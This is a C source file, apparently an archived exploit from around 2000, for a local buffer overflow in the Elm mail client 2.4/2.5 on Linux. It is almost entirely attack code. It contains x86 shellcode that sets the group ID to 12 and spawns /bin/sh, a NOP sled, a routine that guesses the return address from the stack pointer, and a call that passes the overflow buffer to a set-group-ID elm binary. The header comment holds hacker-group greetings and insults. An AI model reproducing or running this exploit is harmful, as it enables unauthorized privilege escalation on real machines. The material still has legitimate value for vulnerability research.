/* Linux Elm 2.4/2.5 local exploit by slash / buffer0verfl0w security This will give you a shell(gid=12) if /usr/bin/elm is SGID. Since there isn't a single persone who didn't code one of these elm exploits I decided to code mah own :) This was tested on slackware 4.0 and redhat 5.1. Offset on slackware -500. So...beware, yet another elm exploit. Shoutouts go to b0f, TESO, ADM, mdma, zsh, FunkySh and all of the people who know me. Disslikes go out to you-know-who: p4riah and h0lmez. Peace out, -- slash - tcsh@b0f.i-p.com - b0f.freebsd.lublin.pl */ #include #include #define NOPS 0x90 /* no operation skip to next instruction */ #define LEN 264 /* our buffersize */ #define PATH "/usr/bin/elm" /* path to the program */ #define OFFSET -500 /* default offset */ char shellcode[] = /* setgid(12); execve("/bin/sh"); */ "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88" "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb" "\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; long esp(void) { __asm__("movl %esp,%eax"); } int main(int argc, char **argv) { char buffer[LEN]; int i, offset; long retaddr; printf("Linux Elm 2.4/2.5 local exploit\n"); printf("coded by slash / buffer0verfl0w security\n"); printf(" \n"); if (argc > 1) offset = atoi(argv[1]); else offset = OFFSET; /* setting up the ret address */ retaddr = (esp() - offset); printf("Using Offset: %d\n", offset); printf("Using return address: 0x%lx\n", retaddr); printf("After this run \"reset\" to reset the terminal\n"); for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = retaddr; /* thanx for the tip {} */ memset(buffer, NOPS, 250 - strlen(shellcode)); /* copying the shellcode into the buffer */ memcpy(buffer + (250 - strlen(shellcode)), shellcode, strlen(shellcode)); /* executing the program */ execlp("PATH", "elm", "-f", buffer, 0); return 0; } /* www.hack.co.za [5 September 2000]*/